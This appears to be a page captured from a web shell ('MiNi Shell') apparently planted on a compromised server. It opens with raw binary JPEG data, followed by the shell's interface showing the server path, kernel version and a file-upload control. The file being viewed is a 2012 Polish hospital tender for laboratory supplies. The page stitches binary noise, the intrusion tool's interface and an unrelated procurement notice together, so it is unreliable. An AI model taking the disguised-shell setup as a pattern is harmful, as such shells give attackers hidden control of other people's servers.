JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120103/3250-N-2012.html

<p class="kh_header"><b>Krotoszyn: Dostawa drobnego sprzętu i szkła laboratoryjnego dla SPZOZ Krotoszyn</b><br>
<b>Numer ogłoszenia: 3250 - 2012; data zamieszczenia: 03.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego sprzętu i szkła laboratoryjnego dla SPZOZ Krotoszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa drobnego sprzętu i szkła laboratoryjnego dla SPZOZ Krotoszyn - pakiet nr 1-9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa drobnego sprzętu i szkła laboratoryjnego, maksymalnie 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.43.70.00-7, 38.43.71.10-1, 33.19.25.00-7, 14.82.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
c.	Projekt umowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 4.
W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKTU UMOWY: 2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się : - zmianę stawek podatku VAT. 3. W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana następuje z mocy prawa. § 13 PROJEKTU UMOWY. 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w sytuacji przewidzianej w § 6 umowy oraz w przypadkach wymienionych poniżej, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności. Strony dopuszczają zmiany umowy w zakresie: 
-	numeru katalogowego produktu  (w tym przypadku zmiana może być dokonana na podstawie pisemnego powiadomienia Zamawiającego o zmianie numeru katalogowego, bez konieczności podpisywania aneksu do umowy, z zaznaczeniem, której pozycji w Formularzu cenowym zmiana numeru katalogowego dotyczy),
-        nazwy produktu przy zachowaniu jego parametrów 
-        przedmiotowym / produkt zamienny 
-        sposobu konfekcjonowania 
-        liczby opakowań 
-        wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego 
-        zmiany liczby badań objętych zapotrzebowaniem Zamawiającego. 

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 10:00, miejsce: SEKRETARIAT SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1    -  nakłuwacze i kuwety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kuweta makro z dwiema ściankami optycznie gładkimi o poj. 4 ml lub 4,5 ml, gładkie ścianki bez zarysowań i zanieczyszczeń				szt.	25 000
2.	Nakłuwacz automatyczny w kształcie literyT - głębokość nakłucia 2,4 mm				szt.	30 000
3.	Nakłuwacz automatyczny w kształcie litery T - głębokość nakłucia 1,8 mm				szt.	1 000
Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 -  probówki, pipety, ezy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bagietka laboratoryjna z polipropylenu pełna dł. 125 mm., średnica 4 mm. 				szt.	1 000
2	Ezy bakteriologiczne jednorazowe jałowe,  
o poj. 1 ul				szt.	1 500
3	Ezy bakteriologiczne jednorazowe jałowe,
o poj. 10 ul				szt.	1 500
4	Pipety pasterowskie jednorazowe jałowe o poj. 1 ml, długość 145 ÷150 mm, podziałka 0,25 ml 				szt.	3 000
5	Pipety pasterowskie jednorazowe nie  jałowe o poj. 1 ml, długość 145 ÷150 mm, podziałka 0,25 ml 				szt.	15 000
6	Końcówka do pipet o poj. do 200 ul typ Eppendorf				szt.	20 000
7	Końcówka do pipet o poj. do 1000 ul typ Eppendorf				szt.	85 000
8	Probówka do koagulologii z przekłuwanym korkiem na 1,8 ÷ 2 ml z 0,2 ml 3,2 % cytrynianu sodu ze znacznikiem				szt.	4 000
9	Probówka o poj. 10 ml , stożkowa z PS				szt.	85 000
10	Probówka o poj. 10 ÷ 11 ml okrągłodenna z korkiem, pusta, bez znacznika z PS 				szt.	4 000
11	Korek do probówki z poz. 10				szt.	4 000
12	Probówka o poj. 5 ml ze znacznikiem i granulatem				szt.	1 000
13	Probówka z granulatem i przspieszczem do szybkiego wykrzepiania krwi z polipropylenu o poj. 10 ÷ 11 ml krwi , przejrzystość bardzo dobra, wymiary 
16 x 100			szt.	30 000
14	Probówka z rozpylonym roztworem EDTA - 2 K, wyraźny znacznik na 1  ml krwi z przekłuwanym korkiem 
wysokość probówki 75 mm (do aparatu Cell - Dyn Ruby )				szt.	20 000
15	Zestaw do OB. na 0,8 ÷ 1 ml krwi                       rurka jednorazowego użytku z podziałkaą
0 - 180 mm i uszczelką mocującą rurkę w probówce, wyraźny znacznik na 1,0 ml krwi				szt.	6 000
16	Probówka plastikowa sterylna z korkiem  o pojemności 10 ÷ 11 ml do pobierania płynu mózgowordzeniowego				szt.	200
17	Probówki z płynem do liczenia retikulocytów
 na 100 mikrolitra krwi				szt.	800

Zamawiający dopuszcza:
 w poz. 4 pipety jałowe pakowane pojedyńczo lub maksymalnie do 5 szt., 
 w poz. 2 i 3 ezy jałowe pakowane pojedyńczo lub maksymalnie do 10 szt.

Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 38.43.71.10-1, 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Płyty do oznaczeń grup krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Płyty do oznaczeń grup krwi jednorazowe na 8 otworów w poziomie				szt.	800
Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Probówka parazytologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Probówka MINI do badań parazytologicznych  				szt.	280
Wymagania dotyczące produktu z poz .1:
1) Zestawy 1x użytku bez konieczności mycia,  2) Probówki gotowe do użycia,  3) Probówki zawierają; utrwalacz- formalinę i triton jako surfaktant w ilosci nie wiekszej niż 2,5 ml
4) Obecne trójwymiarowe filtry umożliwiające łatwą separację jaj, larw, cyst i oocyst pasożytów, 5) Duża klarownosć preparatów, 6) Mała objetość próbki, 
7) Zestaw zawiera octan etylu, 8) Probówki kompatybilne z automatyczną stacją roboczą tego samego producenta.

Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET  NR  5 - Szkło laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Cylinder miarowy szklany 
o poj. 100 ml			szt.	20
2.	Cylinder miarowy szklany 
o poj. 500 ml 			szt.	2
3.	Płytki Petriego - dolna płytka O 5 ÷ 6 cm			szt.	100
4.	Płytki Petriego - dolna płytka O 7 ÷ 8,0 cm			szt.	100
5.	Płytki Petriego  - dolna płytka O10 cm			szt.	100
6.	Kolba stożkowa - Erlenmeyera wąska  szyjka poj.  250 ml			szt.	2
7.	Kolba stożkowa - Erlenmeyera wąska  szyjka poj.  500 ml			szt.	10
8.	Probówki szklane  wys. 15,5 cm  O 1,2 cm (dopuszczone szkło borokrzemowe wytrzymałość do 200 st.cel.)			szt.	50
9.	Probówki szklane o poj. 4 ml 
 ( 12 x 75 )  okrągłodenne			szt.	30 000
10.	Szkiełka podstawowe cięte          
  ( a 50 szt.)			op.	600
11.	Szkiełka podstawowe z matowym polem  
 ( a 50 szt )			op.	100
12.	Szkiełka nakrywkowe  24 x 24 
( a 100 szt)			op.	400
13.	Zlewka niska z wylewem szklana
 o poj. 250 ml			szt.	40
14.	Zlewka niska z wylewem szklana 
o poj. 100 ml			szt.	10
15.	Eksykator z pokrywą bez tubusa z wkładem
porcelanowym O 300 mm			szt.	1

Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.82.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET  NR 6 - kapilary do gazometrii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kapilary do gazometrii o poj.     130 ul z heparyną sodową				szt.	20 000

Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Płytki Petriego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Płytki Petriego jednorazowego użytku sterylne  bez wentylacji O 60 mm 				szt.	300
2.	Płytki Petriego jednorazowego użytku  sterylne  bez wentylacji
O 80 mm  lub O 90 mm				szt.	300


Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Probówki i akcesoria - próżniowy system zamknięty i mikrometoda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 9 ml. Do separacji surowicy.				szt.	30000
2	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 1 ml. z EDTA do hematologii.				szt.	10000
3	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 2 ml. z EDTA do hematologii.				szt.	15000
4	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 4 ml  z heparyną sodową.  				szt.	300
5	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 1 ml. do koagulologii, 3,2% cytrynian sodowy kompatybilna z aparatem SYSMEX 
CS-2100I				szt.	1000
6	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 2 ml. do koagulologii, 3,2% cytrynian sodowy
kompatybilna z aparatem SYSMEX 
CS-2100I				szt.	3000
7	Probówka do próżniowego pobierania krwi w systemie zamkniętym o pojemności 1,5 ml. do oznaczania OB. -  do odczytu logarytmicznego				szt.	5000
8	Probówka do próżniowego pobierania krwi w systemiemie zamkniętym o poj. 2 ml z fluorkirm sodu				szt.	45000
9	Igła dwuostrzowa do próżniowego pobierania krwi, kompatybilna z probówką próżniową i uchwytem w rozmiarach:         
0,7mm ; 0,8mm ; 0,9mm				szt.	45000
10	Uchwyt do igły dwuostrzowej i probówki próżniowej.				szt.	40000
11	Uchwyt do igły dwuostrzowej z nasadką typu Luer.				szt.	5000
12	Statyw OB.- odczyt logarytmiczny, kompatybilny z probówką do próżniowego pobierania krwi, do oznaczania OB  z poz. 7				szt.	3
13	Mikroprobówka do pobierania krwi o poj. 600ul.  do separacji surowicy. 				szt.	5500
14	Mikroprobówka  do pobierania krwi o poj. 600ul. do surowicy z żelem. 				szt.	500
15	Mikroprobówka  z EDTA do pobierania krwi o poj. 500ul. 				szt.	6000

Zamawiający wymaga aby asortyment w pozycjach od 1 do 11 pochodził od jednego producenta, a także aby asortyment z poz. od 12 do 15 był rónież jednego producenta.
Wszystkie korki probówek oznaczone kodem barwnym  zgodnym ze standardami międzynarodowymi w zależności od dodanej substancji.
Dostawca zobowiązuje się przeprowadzić co najmniej 3 szkolenia na oddziałach szpitalnych na własny koszt w terminie podanym przez zamawiającego po zawarciu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET  NR 9 - Mikrowirówka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mikrowirówka jako urządzenie stołowe wyposażona w: - rotor na 6 mikroprobówek o poj.1,5 ml do 2,0 ml   - minimum 6 sztuk adapterów na mikroprobówki o poj. 0,5 - 06 ml. Dane techniczne wirówki: - prędkość maks. 6 000 rpm - RCF 2 000 x g - ładowność min: 6 x 2,2 ml ,- wymiary : (SxDxW) 153 x 153x110- waga: do 1 kg			szt.	1

Uwaga: w przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć  to w formularzu cenowym  zapisem np : nie stosuje..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com